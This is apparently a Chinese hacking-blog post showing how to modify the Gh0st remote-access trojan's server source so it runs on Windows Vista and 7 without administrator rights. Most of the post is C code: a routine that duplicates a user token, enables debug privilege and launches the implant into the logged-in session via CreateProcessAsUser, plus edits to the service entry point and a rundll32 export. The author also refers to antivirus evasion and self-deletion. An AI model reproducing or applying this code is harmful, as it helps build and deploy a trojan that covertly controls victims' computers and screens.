Gh0st屏幕控制完美支持VistaWin7

Gh0st屏幕控制完美支持VistaWin7之前发了个GH0st动态版.看到留言说不支持win7,我想说下,那东西是我两年前改的.只是前几天整理硬盘的时候看到发上来.所以有BUG和不免杀是很正常的事.这两天帮朋友改一个gh0st,在测试win7功能的时候发现以前网上公布的方法不是很好兼容,虽然屏幕可以用,但是上线速度很慢,而且服务端不会自删除.更重要的是还得用管理员模式才能运行,反复找资料和测试.终于解决了gh0st完美兼容Win7和Vista的问题,双击就可以运行,我尽量把笔记写的详细些.如果还有朋友不懂的话可以给我留言或者到http://www.aircmd.com/9.htm这留言.我看到会给你回复的.方法有2种.我说其中一种吧.打开server的until.cpp文件.在最后面#endif的上面加上下列代码DWORD_stdcallLaunchAppIntoDifferentSession(LPTSTRlpCommand){DWORDdwRet=0;PROCESS_INFORMATIONpi;STARTUPINFOsi;DWORDdwSessionId;HANDLEhUserToken=NULL;HANDLEhUserTokenDup=NULL;HANDLEhPToken=NULL;HANDLEhProcess=NULL;DWORDdwCreationFlags;HMODULEhInstKernel32=NULL;typedefDWORD(WINAPI*WTSGetActiveConsoleSessionIdPROC)();WTSGetActiveConsoleSessionIdPROCWTSGetActiveConsoleSessionId=NULL;hInstKernel32=LoadLibrary("Kernel32.dll");if(!hInstKernel32){returnFALSE;}WTSGetActiveConsoleSessionId=(WTSGetActiveConsoleSessionIdPROC)GetProcAddress(hInstKernel32,"WTSGetActiveConsoleSessionId");//Logtheclientontothelocalcomputer.dwSessionId=WTSGetActiveConsoleSessionId();do{WTSQueryUserToken(dwSessionId,&hUserToken);dwCreationFlags=NORMAL_PRIORITY_CLASS|CREATE_NEW_CONSOLE;ZeroMemory(&si,sizeof(STARTUPINFO));si.cb=sizeof(STARTUPINFO);si.lpDesktop="winsta0\\default";ZeroMemory(&pi,sizeof(pi));TOKEN_PRIVILEGEStp;LUIDluid;if(!::OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY|TOKEN_DUPLICATE|TOKEN_ASSIGN_PRIMARY|TOKEN_ADJUST_SESSIONID|TOKEN_READ|TOKEN_WRITE,&hPToken)){dwRet=GetLastError();break;}else;if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&luid)){dwRet=GetLastError();break;}else;tp.PrivilegeCount=1;tp.Privileges[0].Luid=luid;tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;if(!DuplicateTokenEx(hPToken,MAXIMUM_ALLOWED,NULL,SecurityIdentification,TokenPrimary,&hUserTokenDup)){dwRet=GetLastError();break;}else;//AdjustTokenprivilegeif(!SetTokenInformation(hUserTokenDup,TokenSessionId,(void*)&dwSessionId,sizeof(DWORD))){dwRet=GetLastError();break;}else;if(!AdjustTokenPrivileges(hUserTokenDup,FALSE,&tp,sizeof(TOKEN_PRIVILEGES),(PTOKEN_PRIVILEGES)NULL,NULL)){dwRet=GetLastError();break;}else;LPVOIDpEnv=NULL;DWORD(__stdcall*CreateEnvironmentBlock)(LPVOID*,HANDLE,BOOL);CreateEnvironmentBlock=(DWORD(__stdcall*)(LPVOID*,HANDLE,BOOL))GetProcAddress(LoadLibrary("UserEnv.dll"),"CreateEnvironmentBlock");if(!CreateEnvironmentBlock)break;if(CreateEnvironmentBlock(&pEnv,hUserTokenDup,TRUE)){dwCreationFlags|=CREATE_UNICODE_ENVIRONMENT;}elsepEnv=NULL;//Launchtheprocessintheclient'slogonsession.if(CreateProcessAsUser(hUserTokenDup,//client'saccesstokenNULL,//filetoexecutelpCommand,//commandlineNULL,//pointertoprocessSECURITY_ATTRIBUTESNULL,//pointertothreadSECURITY_ATTRIBUTESFALSE,//handlesarenotinheritabledwCreationFlags,//creationflagspEnv,//pointertonewenvironmentblockNULL,//nameofcurrentdirectory&si,//pointertoSTARTUPINFOstructure&pi//receivesinformationaboutnewprocess)){}else{dwRet=GetLastError();break;}}while(0);//PerformAlltheCloseHandlestaskif(NULL!=hUserToken){CloseHandle(hUserToken);}else;if(NULL!=hUserTokenDup){CloseHandle(hUserTokenDup);}else;if(NULL!=hPToken){CloseHandle(hPToken);}else;returndwRet;}然后打开until.h同样在最后面的#endif上面加上DWORD_stdcallLaunchAppIntoDifferentSession(LPTSTRlpCommand);然后打开svchost.cpp搜索extern"C"__declspec(dllexport)voidServiceMain(intargc,wchar_t*argv[])在上面加上extern"C"__declspec(dllexport)voidXiaoDeBu(HWNDhwnd,HINSTANCEhinst,LPTSTRlpCmdLine,intnCmdShow){main(lpCmdLine);}搜索g_dwServiceType=QueryServiceTypeFromRegedit(svcname);在下面加上HANDLEhThread=NULL;OSVERSIONINFOOsVerInfoEx;OsVerInfoEx.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);GetVersionEx(&OsVerInfoEx);if(OsVerInfoEx.dwMajorVersion<6)//判断那种系统，如果小于6，直接用原来的代码{HANDLEhThread=MyCreateThread(NULL,0,(LPTHREAD_START_ROUTINE)main,(LPVOID)svcname,0,NULL);}else{CHARlpCommand[256];CHARStart[MAX_PATH];GetModuleFileName(CKeyboardManager::g_hInstance,Start,sizeof(Start));wsprintf(lpCommand,"rundll32.exe%s,XiaoDeBu%s",Start,svcname);LaunchAppIntoDifferentSession(lpCommand);}然后把HANDLEhThread=MyCreateThread(NULL,0,(LPTHREAD_START_ROUTINE)main,(LPVOID)svcname,0,NULL);这句注释掉.上边代码中GetModuleFileName(CKeyboardManager::g_hInstance,Start,sizeof(Start));也可改成GetModuleFileName(CKernelManager::g_hInstance,Start,sizeof(Start));